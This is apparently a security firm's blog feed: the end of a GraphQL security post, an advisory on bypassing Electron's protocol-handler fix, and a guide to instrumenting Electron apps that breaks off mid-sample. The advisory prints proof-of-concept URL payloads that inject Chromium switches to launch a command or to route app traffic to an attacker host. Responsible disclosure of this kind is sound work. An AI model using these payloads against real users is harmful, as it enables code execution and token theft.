pstrongGraphQL/strong is a new interesting technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilites like strongBroken Access Controls/strong, strongInsecure Direct Object References/strong, strongCross Site Scripting (XSS)/strong and strongClassic Injection Bugs/strong. As any technology, GraphQL-based applications may be prone to development implementation errors like this real-life a href=https://salt.agency/blog/facebook-security-loophole/example/a:/p blockquote p“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”/p /blockquote [email protected]/p h5 id=resourcesResources:/h5 ul lia href=https://en.wikipedia.org/wiki/GraphQLhttps://en.wikipedia.org/wiki/GraphQL/a/li lia href=https://dev-blog.apollodata.com/the-concepts-of-graphql-bc68bd819be3https://dev-blog.apollodata.com/the-concepts-of-graphql-bc68bd819be3/a/li lia href=https://graphql.org/learn/https://graphql.org/learn//a/li lia href=https://www.howtographql.com/https://www.howtographql.com//a/li lia href=https://www.hackerone.com/blog/the-30-thousand-dollar-gem-part-1https://www.hackerone.com/blog/the-30-thousand-dollar-gem-part-1/a/li lia href=https://hackerone.com/reports/291531https://hackerone.com/reports/291531/a/li lia href=https://labs.detectify.com/2018/03/14/graphql-abuse/https://labs.detectify.com/2018/03/14/graphql-abuse//a/li lia href=https://medium.com/the-graphqlhub/graphql-and-authentication-b73aed34bbebhttps://medium.com/the-graphqlhub/graphql-and-authentication-b73aed34bbeb/a/li lia href=http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types//a/li lia href=https://webonyx.github.io/graphql-php/https://webonyx.github.io/graphql-php//a/li /ul

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

23 May 2018 at 22:00
pAs part of an engagement for one of our clients, we analyzed the patch for the recent a href=https://electronjs.org/blog/protocol-handler-fixElectron Windows Protocol handler RCE bug/a (CVE-2018-1000006) and identified a bypass./p pUnder certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. strongElectron apps/strong designed to run on strongWindows/strong that register themselves as the default handler for a protocol and do not prepend emdash-dash/em in the registry entry are affected./p pWe reported the issue to the Electron core team (via [email protected]/em) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s a href=https://twitter.com/newsoft?lang=enNicolas Ruff/a a few days earlier./p h3 id=cve-2018-1000006CVE-2018-1000006/h3 pOn January 22, 2018 Electron released a patch for emv1.7.11/em, emv1.6.16/em and emv1.8.2-beta4/em for a critical vulnerability known as CVE-2018-1000006 (emsurprisingly no fancy name here/em) affecting Electron-based applications running on Windows that register custom protocol handlers./p pThe original issue was extensively discussed in many a href=https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62blog posts/a, and can be summarized as the ability to use custom protocol handlers (e.g. emmyapp:///em) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application./p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;scriptgt;/span span class=nxwin/spanspan class=p./spanspan class=nxlocation/span span class=o=/span span class=dl'/spanspan class=s1myapp://foobar --gpu-launcher=cmd c/ start calc --foobar=/spanspan class=dl'/span span class=ntlt;/scriptgt;/span /code/pre/div/div pInterestingly, on January 31, 2018, Electron emv1.7.12/em, emv1.6.17/em and emv1.8.2-beta5/em were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:/p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;scriptgt;/span span class=nxwin/spanspan class=p./spanspan class=nxlocation/span span class=o=/span span class=dl'/spanspan class=s1myapp://foobar --GPU-launcher=cmd c/ start calc --foobar=/spanspan class=dl'/span span class=ntlt;/scriptgt;/span /code/pre/div/div h3 id=understanding-the-patchUnderstanding the patch/h3 pThe patch for CVE-2018-1000006 is implemented in a href=https://github.com/electron/electron/blob/fe7947da90a6e161e731a10e4246a07b7d71dea3/atom/app/command_line_args.ccelectron/atom/app/command_line_args.cc/a and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments./p div class=language-cpp highlighter-rougediv class=highlightpre class=highlightcodespan class=ktbool/span span class=nfCheckCommandLineArguments/spanspan class=p(/spanspan class=ktint/span span class=nargc/spanspan class=p,/span span class=nbase/spanspan class=o::/spanspan class=nCommandLine/spanspan class=o::/spanspan class=nCharType/spanspan class=o**/span span class=nargv/spanspan class=p)/span span class=p{/span span class=nDCHECK/spanspan class=p(/spanspan class=nstd/spanspan class=o::/spanspan class=nis_sorted/spanspan class=p(/spanspan class=nstd/spanspan class=o::/spanspan class=nbegin/spanspan class=p(/spanspan class=nkBlacklist/spanspan class=p),/span span class=nstd/spanspan class=o::/spanspan class=nend/spanspan class=p(/spanspan class=nkBlacklist/spanspan class=p),/span span class=p[](/spanspan class=kconst/span span class=ktchar/spanspan class=o*/span span class=na/spanspan class=p,/span span class=kconst/span span class=ktchar/spanspan class=o*/span span class=nb/spanspan class=p)/span span class=p{/span span class=kreturn/span span class=nbase/spanspan class=o::/spanspan class=nStringPiece/spanspan class=p(/spanspan class=na/spanspan class=p)/span span class=olt;/span span class=nbase/spanspan class=o::/spanspan class=nStringPiece/spanspan class=p(/spanspan class=nb/spanspan class=p);/span span class=p}))/span span class=olt;lt;/span span class=sThe kBlacklist must be in sorted order/spanspan class=p;/span span class=nDCHECK/spanspan class=p(/spanspan class=nstd/spanspan class=o::/spanspan class=nbinary_search/spanspan class=p(/spanspan class=nstd/spanspan class=o::/spanspan class=nbegin/spanspan class=p(/spanspan class=nkBlacklist/spanspan class=p),/span span class=nstd/spanspan class=o::/spanspan class=nend/spanspan class=p(/spanspan class=nkBlacklist/spanspan class=p),/span span class=nbase/spanspan class=o::/spanspan class=nStringPiece/spanspan class=p(/spanspan class=sinspect/spanspan class=p)))/span span class=olt;lt;/span span class=sRemember to add Node command line flags to kBlacklist/spanspan class=p;/span span class=kconst/span span class=nbase/spanspan class=o::/spanspan class=nCommandLine/spanspan class=o::/spanspan class=nStringType/span span class=ndashdash/spanspan class=p(/spanspan class=mi2/spanspan class=p,/span span class=sc'-'/spanspan class=p);/span span class=ktbool/span span class=nblock_blacklisted_args/span span class=o=/span span class=nbfalse/spanspan class=p;/span span class=kfor/span span class=p(/spanspan class=ktint/span span class=ni/span span class=o=/span span class=mi0/spanspan class=p;/span span class=ni/span span class=olt;/span span class=nargc/spanspan class=p;/span span class=o++/spanspan class=ni/spanspan class=p)/span span class=p{/span span class=kif/span span class=p(/spanspan class=nargv/spanspan class=p[/spanspan class=ni/spanspan class=p]/span span class=o==/span span class=ndashdash/spanspan class=p)/span span class=kbreak/spanspan class=p;/span span class=kif/span span class=p(/spanspan class=nblock_blacklisted_args/spanspan class=p)/span span class=p{/span span class=kif/span span class=p(/spanspan class=nIsBlacklistedArg/spanspan class=p(/spanspan class=nargv/spanspan class=p[/spanspan class=ni/spanspan class=p]))/span span class=kreturn/span span class=nbfalse/spanspan class=p;/span span class=p}/span span class=kelse/span span class=kif/span span class=p(/spanspan class=nIsUrlArg/spanspan class=p(/spanspan class=nargv/spanspan class=p[/spanspan class=ni/spanspan class=p]))/span span class=p{/span span class=nblock_blacklisted_args/span span class=o=/span span class=nbtrue/spanspan class=p;/span span class=p}/span span class=p}/span span class=kreturn/span span class=nbtrue/spanspan class=p;/span span class=p}/span /code/pre/div/div pAs is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments like Electron:/p ul liThe patch relies on a static blacklist of a href=https://peter.sh/experiments/chromium-command-line-switches/available chromium flags/a. On each libchromiumcontent update the Electron team must remember to update the emcommand_line_args.cc/em file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8/li liThe blacklist is implemented using a binary search. Valid flags could be missed by the check if they’re not properly sorted/li /ul h3 id=bypass-and-security-implicationsBypass and security implications/h3 pWe started looking for missed flags and noticed that stronghost-rules/strong was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately stuck out as a good candidate for subverting the process./p pIn fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:/p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=cplt;!doctype htmlgt;/span span class=ntlt;scriptgt;/span span class=nbwindow/spanspan class=p./spanspan class=nxlocation/span span class=o=/span span class=dl'/spanspan class=s1skype://user?userinfo --host-rules=MAP * evil.doyensec.com --foobar=/spanspan class=dl'/span span class=ntlt;/scriptgt;/span /code/pre/div/div pWhen a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to emevil.doyensec.com/em instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:/p video controls= preload=auto width=100% height=100% poster=../../../public/images/skypeelectronbugpoc.png source src=../../../public/images/skypeelectronbugpoc.mp4 type=video/mp4 / Your browser does not support the video tag. /video pWe analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -gt; RCE payloads. With code class=language-plaintext highlighter-rougenodeIntegration/code enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via code class=language-plaintext highlighter-rougenodeIntegration: false/code or code class=language-plaintext highlighter-rougesandbox/code, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses)./p pPlease note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functionss, are not affected by this vulnerability./p h3 id=futureFuture/h3 pOn May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release./p pIn the meantime, Electron application developers are recommended to enforce a dash-dash notation in code class=language-plaintext highlighter-rougesetAsDefaultProtocolClient/code/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nxapp/spanspan class=p./spanspan class=nxsetAsDefaultProtocolClient/spanspan class=p(/spanspan class=nxprotocol/spanspan class=p,/span span class=nxprocess/spanspan class=p./spanspan class=nxexecPath/spanspan class=p,/span span class=p[/span span class=dl'/spanspan class=s1--your-switches-here/spanspan class=dl'/spanspan class=p,/span span class=dl'/spanspan class=s1--/spanspan class=dl'/span span class=p])/span /code/pre/div/div por in the Windows protocol handler registry entry/p pimg src=../../../public/images/regeditprotocol.png alt=secure Windows protocol handler align=center //p pAs a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. emWhen working with Electron, things get even more complicated./em/p [email protected]/p [email protected]/p

Instrumenting Electron Apps for Security Testing

18 July 2018 at 22:00
h3 id=instrumenting-electron-based-applicationsInstrumenting Electron-based applications/h3 pWith the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments./p h3 id=electron-and-processesElectron and processes/h3 pThe a href=https://electronjs.org/Electron Framework/a is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project./p pIn Electron, the strongmain process/strong is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called strongrenderer processes/strong./p pUnlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules./p pAs you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official a href=https://electronjs.org/docs/tutorial/security#checklist-security-recommendationsSecurity Recommendations/a document./p h3 id=unpacking-the-asar-archiveUnpacking the ASAR archive/h3 pThe first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (em.asar/em file). ASAR archives are a simple tar-like format that concatenates files into a single one./p pFirst locate the main ASAR archive of our app, usually named emcore.asar/em or emapp.asar/em./p pOnce we have this file we can proceed with installing the asar utility: code class=language-plaintext highlighter-rougenpm install -g asar/code/p pand extract the whole archive: code class=language-plaintext highlighter-rougeasar extract core.asar destinationfolder/code/p pAt its simplest version, an Electron application includes three files: emindex.js/em, emindex.html/em and empackage.json/em./p pOur first target to inspect is the empackage.json/em file, as it holds the path of the file responsible for the “entry point” of our application:/p div class=language-json highlighter-rougediv class=highlightpre class=highlightcodespan class=p{/spanspan class=w /spanspan class=nlname/spanspan class=p:/spanspan class=w /spanspan class=s2Example App/spanspan class=p,/spanspan class=w /spanspan class=nldescription/spanspan class=p:/spanspan class=w /spanspan class=s2Core App/spanspan class=p,/spanspan class=w /spanspan class=nlmain/spanspan class=p:/spanspan class=w /spanspan class=s2app/index.js/spanspan class=p,/spanspan class=w /spanspan class=nlprivate/spanspan class=p:/spanspan class=w /spanspan class=kctrue/spanspan class=p,/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pIn our example the entry point is the file called emindex.js/em located within the emapp/em folder, which will be executed as the main process. If not specified, emindex.js/em is the default main file. The file emindex.html/em and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every embrowserWindow/em instantiated in the main process./p pIn order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:/p pcode class=language-plaintext highlighter-rougenpm install/code/p pWe should also install a href=https://electronjs.org/devtronDevtron/a, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, NodeIntegration must be on./p pcode class=language-plaintext highlighter-rougenpm install --save-dev devtron/code/p pThen, run the following from the Console tab of the Developer Tools/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcoderequire('devtron').install() /code/pre/div/div h3 id=dealing-with-obfuscated-javascriptDealing with obfuscated javascript/h3 pWhenever the application is neither minimized nor obfuscated, we can easily inspect the code./p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=dl'/spanspan class=s1use strict/spanspan class=dl'/spanspan class=p;/span span class=nbObject/spanspan class=p./spanspan class=nxdefineProperty/spanspan class=p(/spanspan class=nxexports/spanspan class=p,/span span class=dl/spanspan class=s2__esModule/spanspan class=dl/spanspan class=p,/span span class=p{/span span class=navalue/spanspan class=p:/span span class=kctrue/span span class=p});/span span class=nxexports/spanspan class=p./spanspan class=nxstartup/span span class=o=/span span class=nxstartup/spanspan class=p;/span span class=nxexports/spanspan class=p./spanspan class=nxhandleSingleInstance/span span class=o=/span span class=nxhandleSingleInstance/spanspan class=p;/span span class=nxexports/spanspan class=p./spanspan class=nxsetMainWindowVisible/span span class=o=/span span class=nxsetMainWindowVisible/spanspan class=p;/span span class=kdvar/span span class=nx_require/span span class=o=/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1electron/spanspan class=dl'/spanspan class=p),/span span class=nxMenu/span span class=o=/span span class=nx_require/spanspan class=p./spanspan class=nxMenu/spanspan class=p;/span span class=kdvar/span span class=nxmainScreen/span span class=o=/span span class=kvoid/span span class=mi0/spanspan class=p;/span span class=kdfunction/span span class=nxstartup/spanspan class=p(/spanspan class=nxbootstrapModules/spanspan class=p)/span span class=p{/span span class=p[/span span class=o--/span span class=nxcut/span span class=o--/span span class=p]/span /code/pre/div/div pIn case of obfuscation, there are no silver bullets to unfold heavily manipulated javascript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source./p pTake this horrendous piece of JS as an example:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nbeval/spanspan class=p(/spanspan class=kdfunction/spanspan class=p(/spanspan class=nxc/spanspan class=p,/spanspan class=nxd/spanspan class=p,/spanspan class=nxe/spanspan class=p,/spanspan class=nxf/spanspan class=p,/spanspan class=nxg/spanspan class=p,/spanspan class=nxh/spanspan class=p){/spanspan class=nxg/spanspan class=o=/spanspan class=kdfunction/spanspan class=p(/spanspan class=nxi/spanspan class=p){/spanspan class=kreturn/spanspan class=p(/spanspan class=nxi/spanspan class=olt;/spanspan class=nxd/spanspan class=p?/spanspan class=dl''/spanspan class=p:/spanspan class=nxg/spanspan class=p(/spanspan class=nbparseInt/spanspan class=p(/spanspan class=nxi/spanspan class=o//spanspan class=nxd/spanspan class=p)))/spanspan class=o+/spanspan class=p((/spanspan class=nxi/spanspan class=o=/spanspan class=nxi/spanspan class=o%/spanspan class=nxd/spanspan class=p)/spanspan class=ogt;/spanspan class=mh0x23/spanspan class=p?/spanspan class=nbString/spanspan class=p[/spanspan class=dl'/spanspan class=se\/spanspan class=s1x66/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x6d/spanspan class=se\/spanspan class=s1x43/spanspan class=se\/spanspan class=s1x68/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x43/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x64/spanspan class=se\/spanspan class=s1x65/spanspan class=dl'/spanspan class=p](/spanspan class=nxi/spanspan class=o+/spanspan class=mh0x1d/spanspan class=p):/spanspan class=nxi/spanspan class=p[/spanspan class=dl'/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x53/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x67/spanspan class=dl'/spanspan class=p](/spanspan class=mh0x24/spanspan class=p));};/spanspan class=kwhile/spanspan class=p(/spanspan class=nxe/spanspan class=o--/spanspan class=p){/spanspan class=kif/spanspan class=p(/spanspan class=nxf/spanspan class=p[/spanspan class=nxe/spanspan class=p]){/spanspan class=nxc/spanspan class=o=/spanspan class=nxc/spanspan class=p[/spanspan class=dl'/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x70/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x65/spanspan class=dl'/spanspan class=p](/spanspan class=knew/span span class=nbRegExp/spanspan class=p(/spanspan class=dl'/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x62/spanspan class=dl'/spanspan class=o+/spanspan class=nxg/spanspan class=p(/spanspan class=nxe/spanspan class=p)/spanspan class=o+/spanspan class=dl'/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x62/spanspan class=dl'/spanspan class=p,/spanspan class=dl'/spanspan class=se\/spanspan class=s1x67/spanspan class=dl'/spanspan class=p),/spanspan class=nxf/spanspan class=p[/spanspan class=nxe/spanspan class=p]);}}/spanspan class=kreturn/span span class=nxc/spanspan class=p;}(/spanspan class=dl'/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x38/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x70/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x73/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x2c/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x64/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x67/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x6d/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x64/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x2c/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x75/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x66/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x66/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x38/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x71/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x2c/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x67/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x38/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x77/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x42/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x43/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x76/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x5c/spanspan class=se\/spanspan class=s1x41/spanspan class=se\/spanspan class=s1x22/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x6b/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x7b/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x30/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x30/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x68/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x7b/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x2b/spanspan class=se\/spanspan class=s1x2b/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x2b/spanspan class=se\/spanspan class=s1x68/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x7d/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x31/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x7b/spanspan class=se\/spanspan class=s1x79/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x7d/spanspan class=se\/spanspan class=s1x7d/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x3d/spanspan class=se\/spanspan class=s1x7a/spanspan class=se\/spanspan class=s1x20/spanspan class=se\/spanspan class=s1x6b/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x29/spanspan class=se\/spanspan class=s1x3b/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x2e/spanspan class=se\/spanspan class=s1x44/spanspan class=se\/spanspan class=s1x28/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x5b/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x5d/spanspan class=se\/spanspan class=s1x29/spanspan class=dl'/spanspan class=p,/spanspan class=mh0x28/spanspan class=p,/spanspan class=mh0x28/spanspan class=p,/spanspan class=dl'/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x30/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x30/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x46/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x31/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x66/spanspan class=se\/spanspan class=s1x75/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x31/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x76/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x43/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x5f/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x6f/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x68/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x73/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan 